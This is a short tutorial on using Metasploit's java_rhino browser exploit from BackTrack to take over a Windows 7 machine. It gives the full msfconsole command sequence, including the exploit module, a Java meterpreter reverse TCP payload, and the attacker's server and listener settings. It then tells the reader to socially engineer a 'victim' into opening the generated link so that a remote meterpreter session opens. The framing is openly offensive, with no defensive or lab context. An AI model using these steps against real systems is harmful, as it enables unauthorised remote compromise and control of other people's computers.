Backtrack java rhino exploit

Browser Java Rhino exploit Tutorial

we are going to pwn windows 7 with a java exploit called: JAVA RHINO Exploit. Here i quote from the Armitage console's description of the exploit:" This module exploits a vulnerability in the Rhino Script Engine that can be used by Java Applet to run an arbitrary code outside of the sandbox" The vulnerability affects version 7 and earlier versions, and should work on any browser: firefox, safari, internet explorer, google chrome etc...
First of all, you have to update the metasploit svn by the custom command #msfupdate , to make sure that the above exploit is included in your Backtrack exploits database. Then run:

#msfconsole

Then use this exploit:

#use exploit/multi/browser/java_rhino

Next set payload:

#set payload/java/meterpreter/reverse/tcp

At this level, type these commands, the first one is meant to set up the server:

#set srvhost 192.168.1.6

In this case: 192.168.1.6 is my internal ip, you have to change this value with your own ip. If you don't know how to get your ip address, just open a ternimal and type: #ifconfig.The next command will define the port of the server which is usually port 80.

#set srvport 80

Next command is for setting up the path of the exploit:

#set uripath java_rhino

# set lhost 192.168.1.6

#set lport 443

Notice also that the srvhost & the lhost have the same ip address. Finally, type this command and wait for a connection:


#exploit

A link has been generated : Local IP://192.168.1.6:80/java_rhino, you have to copy the link and send it to your victim. Once you succeed in "social engineering" the link to a victim, the sending stage starts, and you'll have a java meterpreter session.

A meterpreter session will be created.
That's it Windows 7 is pwned  =)